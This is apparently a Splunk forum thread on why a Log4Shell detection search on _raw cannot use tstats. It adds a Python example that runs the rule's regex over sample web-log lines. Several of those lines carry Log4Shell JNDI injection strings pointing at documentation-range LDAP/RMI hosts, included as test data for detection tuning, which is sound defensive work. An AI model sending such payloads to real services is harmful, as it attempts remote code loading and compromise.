Hi Splunkers,
in my tasks I performed an exam of some existing Splunk searches, and one of these is about a Log4j vulnerability; in particular, I encountered the rule ESCU - Log4Shell JNDI Payload Injection Attempt - Rule, which has the following code:
| from datamodel Web.Web | regex _raw="[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?" | fillnull | stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user | `log4shell_jndi_payload_injection_attempt_filter`
I noted the use of the _raw field and that, even if a datamodel is used, the tstats command is avoided and instead a normal stats is in the code. So I tried to translate it into a search which uses tstats, something like this:
| tstats summariesonly=true fillnull_value="N/D" count from datamodel=Web by Web.log_region, Web.log_country, index, host, Web.src, Web.dest _raw
| `drop_dm_object_name("Web")`
| regex _raw="[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?"
and I got no result; then I removed the regex filter and noted that, when the search is performed, the _raw field is filled with the "N/D" value. Does this mean that _raw cannot be used with tstats?
Correct. Datamodels do not contain _raw.
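To show why the original rule works on _raw and not on datamodel fields, here is an added example (my own code, not from the ESCU rule or from Splunk) that applies the rule's regex, copied verbatim, to the raw text of a few constructed web access-log lines, then reproduces the `stats count by` aggregation and the trailing filter macro in Python. The combined-log parser, the sample lines, and the assumption that the `log4shell_jndi_payload_injection_attempt_filter` macro is a source-address allowlist are all my own; the real macro's content is site specific. One line (`dind/x://y`) is included on purpose: the character class `[jJnNdDiI]{4}` matches any four characters from that set, not only the string "jndi", so a detection engineer tuning this rule should expect such false positives and handle them in the filter macro.

```python
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional, Tuple

# Detection regex copied unchanged from the ESCU rule quoted in the question.
# Python's re module treats a backslash before punctuation (\: \% \/) as a
# literal, so the Splunk pattern compiles as-is.
JNDI_PATTERN = re.compile(
    r"[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?"
)

# Minimal parser for the Apache/NGINX combined log format. It stands in for
# the Web datamodel fields (src, http_method, url, http_referrer,
# http_user_agent); these are the only parts of the event a datamodel carries.
COMBINED_LOG = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<http_method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<http_referrer>[^"]*)" "(?P<http_user_agent>[^"]*)"$'
)

# Constructed sample access-log lines (not real traffic). 198.51.100.0/24 and
# 203.0.113.0/24 are documentation address ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:22:15:01 +0000] "GET /index.html?x=${jndi:ldap://198.51.100.7/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:22:15:02 +0000] "GET /login?user=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:22:15:03 +0000] "GET /api/health HTTP/1.1" 200 17 "-" "${JNDI:rmi://198.51.100.23/x}"',
    '203.0.113.5 - - [10/Dec/2021:22:15:04 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 8192 "https://example.test/" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:22:15:05 +0000] "GET /files?id=dind/x://y HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]


def jndi_match(raw: str) -> Optional[str]:
    """Return the substring the rule's regex matches in a raw event, or None."""
    m = JNDI_PATTERN.search(raw)
    return m.group(0) if m else None


def parse_combined(raw: str) -> Dict[str, str]:
    """Extract datamodel-like fields from one combined-format line."""
    m = COMBINED_LOG.match(raw)
    if not m:
        raise ValueError(f"unparseable line: {raw!r}")
    fields = m.groupdict()
    fields["_raw"] = raw  # the full event text the original rule searches
    return fields


def find_jndi_candidates(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Equivalent of `| regex _raw=...`: keep events whose raw text matches.

    The match runs over the whole raw line (URL, referrer and user agent
    included), which is why it needs _raw rather than an accelerated
    datamodel summary.
    """
    hits = []
    for raw in lines:
        matched = jndi_match(raw)
        if matched is None:
            continue
        event = parse_combined(raw)
        event["jndi_match"] = matched
        hits.append(event)
    return hits


def count_by(events: Iterable[Dict[str, str]],
             keys: Tuple[str, ...]) -> Dict[Tuple[str, ...], int]:
    """Equivalent of `| stats count by <keys>`."""
    return dict(Counter(tuple(e[k] for k in keys) for e in events))


def apply_filter(events: Iterable[Dict[str, str]],
                 allowlisted_src: set) -> List[Dict[str, str]]:
    """Stand-in for the `log4shell_jndi_payload_injection_attempt_filter`
    macro. Assumed here to drop allowlisted source addresses; the real macro
    is tuned per site."""
    return [e for e in events if e["src"] not in allowlisted_src]


if __name__ == "__main__":
    hits = find_jndi_candidates(SAMPLE_LOG)
    for h in hits:
        print(f'{h["src"]:>14}  matched {h["jndi_match"]!r}')
    print(count_by(hits, ("src", "http_method")))
    print(len(apply_filter(hits, {"203.0.113.9"})), "events after filter")
```

Running it shows four of the five lines flagged: the plain `${jndi:ldap://...}` in a URL, the URL-encoded `%24%7Bjndi%3A...` form, the uppercase `${JNDI:rmi://...}` placed in the user agent, and the harmless `dind/x://` string that only matches because of the loose character class; the `jndi-tutorial.html` request is not flagged because "-" is not one of the separators the regex accepts.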